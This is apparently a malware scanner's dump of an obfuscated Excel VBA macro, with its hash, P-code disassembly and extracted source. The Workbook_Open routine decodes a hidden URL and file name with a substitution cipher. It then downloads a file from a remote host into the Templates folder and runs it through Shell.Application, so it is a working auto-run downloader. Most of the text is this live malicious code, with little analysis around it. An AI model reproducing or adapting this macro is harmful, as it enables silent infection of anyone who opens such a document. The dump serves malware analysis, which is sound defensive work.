(As Integer) ' Line #31: ' Dim ' VarDefn ·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼ ' Line #32: ' Dim ' VarDefn ·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼ ' Line #33: ' LitDI2 0x0001 ' St ¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡ ' Line #34: ' Line #35: ' Line #36: ' Line #37: ' Line #38: ' SetStmt ' LitStr 0x0011 "microsoft.xmlhttp" ' ArgsLd ¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·¶¨¼©½¯°¯¨«¡£»§¸³°¸®¥ 0x0001 ' Set ·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼ ' Line #39: ' SetStmt ' LitStr 0x0011 "Shell.Application" ' ArgsLd ¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·¶¨¼©½¯°¯¨«¡£»§¸³°¸®¥ 0x0001 ' Set ¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬ ' Line #40: ' Line #41: ' Ld id_0286 ' LitStr 0x000B "\N§KJââ.ÂÛÂ" ' ArgsLd ¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸·º§¤°¬¤ 0x0001 ' Add ' St ¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹ ' Line #42: ' LitStr 0x0003 "get" ' LitStr 0x0070 "hÖÖÓÕ://ÅlÒÀÖvÒÀÖÄÅ.ÜdÅÕ.ÂÙ/ÁÂÙkÂÅÔgÖÒÃÃÄÁÂÀÃÅmÒÃÃÄkÂÅÔgÖÂÔ/ÂÖwÂÖjkdÅgjÂdÃlkkÖgÂÔkÖgÅÂÔÖhÂÔgÔgÂÔgÂ/ÕÂÔÛÁvÂÔ1.ÂÛÂ" ' ArgsLd ¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸·º§¤°¬¤ 0x0001 ' LitVarSpecial (False) ' Ld ·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼ ' ArgsMemCall Open 0x0003 ' Line #43: ' Ld ·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼ ' ArgsMemCall Sheet1 0x0000 ' Line #44: ' Ld ·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼ ' MemLd Sheet2 ' St °¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼ ' Line #45: ' Ld ·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼ ' MemLd Sheet3 ' LitDI2 0x00C8 ' Eq ' IfBlock ' Line #46: ' SetStmt ' LitStr 0x000C "adodb.stream" ' ArgsLd ¼´·©¾½¹ª¬²¾¢²¡¶¸¯¢¡µ»¸¦´¿¤¸´£¯©©©§¿»¿³ºº«©¨¬³»·£®¬°®«£´¿§¯¸§·¶¨¼©½¯°¯¨«¡£»§¸³°¸®¥ 0x0001 ' Set «¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³ ' Line #47: ' Ld «¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³ ' ArgsMemCall Open 0x0000 ' Line #48: ' Ld ¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡ ' Ld «¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³ ' MemSt Type ' Line #49: ' Ld °¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼ ' Ld «¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³ ' ArgsMemCall Xor 0x0001 ' Line #50: ' Ld ¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹ ' Ld ¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡ ' Ld ¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡ ' Add ' Ld «¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³ ' ArgsMemCall Workbook 0x0002 ' Line #51: ' Ld «¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³ ' ArgsMemCall Close 0x0000 ' Line #52: ' EndIfBlock ' Line #53: ' Ld ¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹ ' Paren ' Ld ¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬ ' ArgsMemCall Open 0x0001 ' Line #54: ' EndSub ' Line #55: ' Line #56: ' _VBA_PROJECT_CUR/VBA/Sheet1 - 977 bytes ' _VBA_PROJECT_CUR/VBA/Sheet2 - 977 bytes ' _VBA_PROJECT_CUR/VBA/Sheet3 - 977 bytes

SHA-256: ddb7ac6549b47ec0971fbe9fb09561fd63d7746700f0a5f9e6f1638c1738ea4e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Module1"
Sub Cil()

End Sub

Attribute VB_Name = "Hjfmkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
    Public Function ¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬(¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡)
        ·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼ = " ?!@#$%^&*()_+|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãäåØ¶§Ú¥"
        ·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼ = " ¿¡@#$%^&*()_+|01²³456789ÀbÁdÂÃghÄjklmÅÒÓqÔÕÖÙvwÛÜz.,-~AàáâãFGHäJKåMNØ¶QR§TÚVWX¥Z?!23acefinoprstuxyBCDEILOPSUY"
        For i = 1 To Len(¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡)
            ¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸·º§¤°¬¤ = InStr(·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼, Mid(¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡, i, 1))
            If ¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸·º§¤°¬¤ > 0 Then
                ¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º = Mid(·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼, ¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸·º§¤°¬¤, 1)
                ·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ = ·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ + ¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º
            Else
                ·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ = ·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ + Mid(¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡, i, 1)
            End If
        Next
        ¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬ = ·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ
    End Function


Private Sub Workbook_Open()
Dim WshShell As Object
    Dim BSpecialPathB As String
Dim ·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼® As Integer
·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼® = Chr(50) + Chr(48) + Chr(48)
  

    Set WshShell = CreateObject("WScript.Shell")
    BSpecialPathB = WshShell.SpecialFolders("Templates")
Dim ¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º
Dim »ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µ
Dim ¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾§³¿¸½¤§»¼
Dim ¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸
Dim «¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³
Dim °¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼ As Integer
Dim ¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾
Dim ¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹
°¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼ = 1




Set ¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾ = CreateObject("microsoft.xmlhttp")
Set «¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³ = CreateObject("Shell.Application")

¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸ = BSpecialPathB + ¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬("\N§KJââ.ÂÛÂ")
¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾.Open "get", ¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬("hÖÖÓÕ://ÅlÒÀÖvÒÀÖÄÅ.ÜdÅÕ.ÂÙ/ÁÂÙkÂÅÔgÖÒÃÃÄÁÂÀÃÅmÒÃÃÄkÂÅÔgÖÂÔ/ÂÖwÂÖjkdÅgjÂdÃlkkÖgÂÔkÖgÅÂÔÖhÂÔgÔgÂÔgÂ/ÕÂÔÛÁvÂÔ1.ÂÛÂ"), False
¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾.send
»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µ = ¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾.responseBody
If ¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾.Status = 200 Then
Set ¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º = CreateObject("adodb.stream")
¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º.Open
¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º.Type = °¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼
¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º.Write »ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µ
¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º.SaveToFile ¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸, °¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼ + °¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼
¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸·º§¤°¬¤¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º.Close
End If
«¦²®¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬¬¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£©¯¦°ªª½µª´»«¹¬º½£©«¯¤¦¸ªµ¸¶¼¾¨µ¶¼®¾²º©³.Open (¼¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸)
End Sub



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Processing file: /opt/analyzer/scan_staging/a013e1f12840431f978ff4c3181f2066.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/Module1 - 958 bytes
' Line #0:
' 	FuncDefn (Sub °¯¨«¡£»§¸³°¸®¥¸²·ª®µ¶¦¶¹¾¸¥°²°³¯ª¦¼««¢°³£¼ª¯·¤¢º¤¢·µ¥³®®´¸¿²½°¿¥º¥²¢¹¡¼³¹½º®¤¶º»¯¡¤¾¿´·¬§®µ³())
' Line #1:
' Line #2:
' 	EndSub 
' _VBA_PROJECT_CUR/VBA/Hjfmkbook - 5368 bytes
' Line #0:
' 	FuncDefn (Public Function ¾¨µ¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¥´º¨¡¨¾°½¼¢¬£ª¨·¨¢¥¶´®¡¾º·¾§³¿¸½¤§»¼°¼¿ª¾²¸¸·º§¤°¬¤(¥µ·¹´¬£¨¾³µ¯³¶½»²¹¦¦º¿¨¸«¸©²¯²¸µ¿¶«¹¿«®§´¼¯®¨¶³ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²®¢®°»¬»º, id_FFFE As Variant))
' Line #1:
